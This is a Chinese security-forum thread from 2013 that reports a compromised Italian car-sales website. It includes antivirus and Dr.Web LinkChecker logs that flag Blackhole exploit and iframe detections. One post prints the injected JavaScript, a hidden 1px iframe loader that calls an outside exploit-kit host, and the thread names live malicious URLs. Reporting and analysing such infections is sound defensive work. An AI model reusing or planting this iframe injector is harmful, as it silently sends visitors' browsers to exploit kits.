地址太长了我放1楼了……【挂马 by 哀酱】

显示全部楼层 · 发表于 2013-4-12 18:48:19

本帖最后由蓝核于 2013-4-14 09:13 编辑

2013/4/12 18:47:43 已删除 (清理失败，因为该检测项不可清理) l\AA C:\Program Files (x86)\Google\Chrome\Application\chrome.exe C:\Sandbox\AA\Chrome\user\current\AppData\Local\Google\Chrome\User Data\Default\Cache\f_0002f0 JS/Exploit-Blacole.ht (特洛伊)

http://www.offerteautousate.eu/420-audi-a4-cabriolet-25-v6-tdi.php

复制代码

显示全部楼层 · 发表于 2013-4-13 20:27:07

显示全部楼层 · 发表于 2013-4-13 21:01:02

本帖最后由哀酱俏佳人于 2013-4-13 21:02 编辑

(function () {
var taqj = document.createElement('iframe');

taqj.src = 'http://4pfotenshop.
eu/pub/clik.php';
taqj.style.position = 'absolute';
taqj.style.border = '0';
taqj.style.
height = '1px';
taqj.style.width = '1px';
taqj.style.left = '1px';
taqj.style.top = '1px
';

if (!document.getElementById('taqj')) {
      document.write('<div id=\'taqj\'></div>
');
      document.getElementById('taqj').appendChild(taqj);
}
})();

(function () {
var fdg = document.createElement('iframe');

fdg.src = 'http://4pfotenshop.eu
/pub/clik.php';
fdg.style.position = 'absolute';
fdg.style.border = '0';
fdg.style.heigh
t = '1px';
fdg.style.width = '1px';
fdg.style.left = '1px';
fdg.style.top = '1px';

if (!document.getElementById('fdg')) {
      document.write('<div id=\'fdg\'></div>
');
      document.getElementById('fdg').appendChild(fdg);
}
})();

显示全部楼层 · 发表于 2013-4-14 13:25:58

显示全部楼层 · 发表于 2013-4-14 14:48:04

Checking:http://www.offerteautousate.eu//vetrina/js/jquery-ui-1.8.16.custom.min.js
File size:21.62 KB
File MD5:dffc321afa5baba1a3deecc795524f00

http://www.offerteautousate.eu//vetrina/js/jquery-ui-1.8.16.custom.min.js - Ok

Checking:http://www.hebdotop.it/cgi-bin/hebdotop_it.eur?id=14491
File size:220 bytes
File MD5:acd4aafef564ab167b4b0bbc61d386f0

http://www.hebdotop.it/cgi-bin/hebdotop_it.eur?id=14491 - archive JS-HTML
>http://www.hebdotop.it/cgi-bin/hebdotop_it.eur?id=14491/JSFile_1[0][dc] - Ok
http://www.hebdotop.it/cgi-bin/hebdotop_it.eur?id=14491 - Ok

Checking:http://www.offerteautousate.eu//plugins/system/mtupgrade/mootools.js
File size:120.00 KB
File MD5:14c0e155a4129d210c9f50064e54c312

http://www.offerteautousate.eu//plugins/system/mtupgrade/mootools.js - archive JS-HTML
>http://www.offerteautousate.eu//plugins/system/mtupgrade/mootools.js/JSTag_1[307f][1af7f] - Ok
http://www.offerteautousate.eu//plugins/system/mtupgrade/mootools.js - Ok

Checking:http://pagead2.googlesyndication.com/pagead/show_ads.js
File size:13.35 KB
File MD5:b765778d96aba60d2081925e8bad003a

http://pagead2.googlesyndication.com/pagead/show_ads.js - archive JS-HTML
>http://pagead2.googlesyndication.com/pagead/show_ads.js/JSTag_1[33bd][1ab] - Ok
http://pagead2.googlesyndication.com/pagead/show_ads.js - Ok

Checking:https://apis.google.com/js/plusone.js
File size:24.03 KB
File MD5:721db19b1614f4ef34efea4cb7fa9bd9

https://apis.google.com/js/plusone.js - Ok

Checking:http://www.offerteautousate.eu//vetrina/js/jquery-1.6.2.min.js
File size:92.18 KB
File MD5:6f174249eadbb9e40c350d767fe23740

http://www.offerteautousate.eu//vetrina/js/jquery-1.6.2.min.js - archive JS-HTML
>http://www.offerteautousate.eu//vetrina/js/jquery-1.6.2.min.js/JSTag_1[115f0][5ac5] - Ok
http://www.offerteautousate.eu//vetrina/js/jquery-1.6.2.min.js - Ok

Checking:http://www.offerteautousate.eu/420-audi-a4-cabriolet-25-v6-tdi.php
Engine version:7.0.4.9250
Total virus-finding records:3848606
File size:76.38 KB
File MD5:21073915b90c1aecd5c6bcca4e150ccc

http://www.offerteautousate.eu/420-audi-a4-cabriolet-25-v6-tdi.php - archive JS-HTML
>http://www.offerteautousate.eu/420-audi-a4-cabriolet-25-v6-tdi.php/JSTAG_1[6ac][7d] - Ok
>http://www.offerteautousate.eu/420-audi-a4-cabriolet-25-v6-tdi.php/JSTAG_2[97e][1e6] - Ok
>http://www.offerteautousate.eu/420-audi-a4-cabriolet-25-v6-tdi.php/JSTAG_3[bab][fea] - Ok
>http://www.offerteautousate.eu/420-audi-a4-cabriolet-25-v6-tdi.php/JSTAG_4[1bda][3bc] - Ok
>http://www.offerteautousate.eu/420-audi-a4-cabriolet-25-v6-tdi.php/JSTAG_5[229f][da] - Ok
>http://www.offerteautousate.eu/420-audi-a4-cabriolet-25-v6-tdi.php/JSTAG_6[23bb][da] - Ok
>http://www.offerteautousate.eu/420-audi-a4-cabriolet-25-v6-tdi.php/JSTAG_7[24c6][1ae] - Ok
>http://www.offerteautousate.eu/420-audi-a4-cabriolet-25-v6-tdi.php/JSTAG_8[26a2][1d4] - Ok
>http://www.offerteautousate.eu/420-audi-a4-cabriolet-25-v6-tdi.php/JSTAG_9[2a3b][115] - Ok
>http://www.offerteautousate.eu/420-audi-a4-cabriolet-25-v6-tdi.php/JSTAG_10[2b7a][34c] - Ok
>http://www.offerteautousate.eu/420-audi-a4-cabriolet-25-v6-tdi.php/JSTAG_11[2fb6][9c] - Ok
>http://www.offerteautousate.eu/420-audi-a4-cabriolet-25-v6-tdi.php/JSTAG_12[331e][9c1] infected with Exploit.BlackHole.166
>http://www.offerteautousate.eu/420-audi-a4-cabriolet-25-v6-tdi.php/JSTAG_13[4edd][9c1] infected with Exploit.BlackHole.166
>http://www.offerteautousate.eu/420-audi-a4-cabriolet-25-v6-tdi.php/JSTAG_14[5979][129b] - Ok
>http://www.offerteautousate.eu/420-audi-a4-cabriolet-25-v6-tdi.php/JSTAG_15[737c][1bc] - Ok
>http://www.offerteautousate.eu/420-audi-a4-cabriolet-25-v6-tdi.php/JSTAG_16[b6aa][a4] - Ok
>http://www.offerteautousate.eu/420-audi-a4-cabriolet-25-v6-tdi.php/JSTAG_17[beb0][ad5] infected with JS.IFrame.413
>http://www.offerteautousate.eu/420-audi-a4-cabriolet-25-v6-tdi.php/JSTAG_18[cc4f][f3b] - Ok
>http://www.offerteautousate.eu/420-audi-a4-cabriolet-25-v6-tdi.php/JSTAG_19[d0b5][ad5] infected with JS.IFrame.413
>http://www.offerteautousate.eu/420-audi-a4-cabriolet-25-v6-tdi.php/JSTAG_20[dea4][cb] - Ok
>http://www.offerteautousate.eu/420-audi-a4-cabriolet-25-v6-tdi.php/JSTAG_21[e9fe][a3] - Ok
>http://www.offerteautousate.eu/420-audi-a4-cabriolet-25-v6-tdi.php/JSTAG_22[f85e][10d] - Ok
>http://www.offerteautousate.eu/420-audi-a4-cabriolet-25-v6-tdi.php/JSTAG_23[105f2][9c1] infected with Exploit.BlackHole.166
>http://www.offerteautousate.eu/420-audi-a4-cabriolet-25-v6-tdi.php/JSTAG_24[11776][9c1] infected with Exploit.BlackHole.166
>http://www.offerteautousate.eu/420-audi-a4-cabriolet-25-v6-tdi.php/JSTAG_25[127a1][9de] infected with JS.IFrame.413
>http://www.offerteautousate.eu/420-audi-a4-cabriolet-25-v6-tdi.php/JSTag_26[983][1e1] - Ok
>http://www.offerteautousate.eu/420-audi-a4-cabriolet-25-v6-tdi.php/JSTag_27[1bf0][3a6] - Ok
>http://www.offerteautousate.eu/420-audi-a4-cabriolet-25-v6-tdi.php/JSTag_28[22a4][d5] - Ok
>http://www.offerteautousate.eu/420-audi-a4-cabriolet-25-v6-tdi.php/JSTag_29[23c0][d5] - Ok
>http://www.offerteautousate.eu/420-audi-a4-cabriolet-25-v6-tdi.php/JSTag_30[2fbb][97] - Ok
>http://www.offerteautousate.eu/420-audi-a4-cabriolet-25-v6-tdi.php/JSTag_31[b6af][9f] - Ok
>http://www.offerteautousate.eu/420-audi-a4-cabriolet-25-v6-tdi.php/JSTag_32[ea03][9e] - Ok
>http://www.offerteautousate.eu/420-audi-a4-cabriolet-25-v6-tdi.php/IFrame_33[d3] - Ok

蜘蛛

显示全部楼层 · 发表于 2013-4-14 14:53:02

klinxun 发表于 2013-4-14 14:48
蜘蛛

蜘蛛的日志么？一开始我以为你贴出的是自己的分析报告了？

显示全部楼层 · 发表于 2013-4-14 15:06:39

蓝核发表于 2013-4-14 14:53
蜘蛛的日志么？一开始我以为你贴出的是自己的分析报告了？

蜘蛛的浏览器插件，该插件其实就是利用蜘蛛的网页分析功能。但当然没人工的深入，一些挂马的未必分析出来，但gate还是可能会拦截。

显示全部楼层 · 发表于 2013-4-14 15:07:54

klinxun 发表于 2013-4-14 15:06
蜘蛛的浏览器插件，该插件其实就是利用蜘蛛的网页分析功能。但当然没人工的深入，一些挂马的未必分析出 ...

可以单独安装么？人工的也差不多……分析过程

显示全部楼层 · 发表于 2013-4-14 15:09:50

蓝核发表于 2013-4-14 15:07
可以单独安装么？人工的也差不多……分析过程

可以，在谷歌、火狐、opera的扩展站点搜索“Dr.Web LinkChecker”，或者到这里ftp://ftp.drweb.com/pub/drweb/linkchecker/看看

显示全部楼层 · 发表于 2013-4-14 15:13:31

klinxun 发表于 2013-4-14 15:09
可以，在谷歌、火狐、opera的扩展站点搜索“Dr.Web LinkChecker”，或者到这里ftp://ftp.drweb.com/pub/d ...

非常感谢您的回复，请等我人气cd好了奉上~~~

[已鉴定] 地址太长了我放1楼了……【挂马 by 哀酱】

评分

评分

评分

评分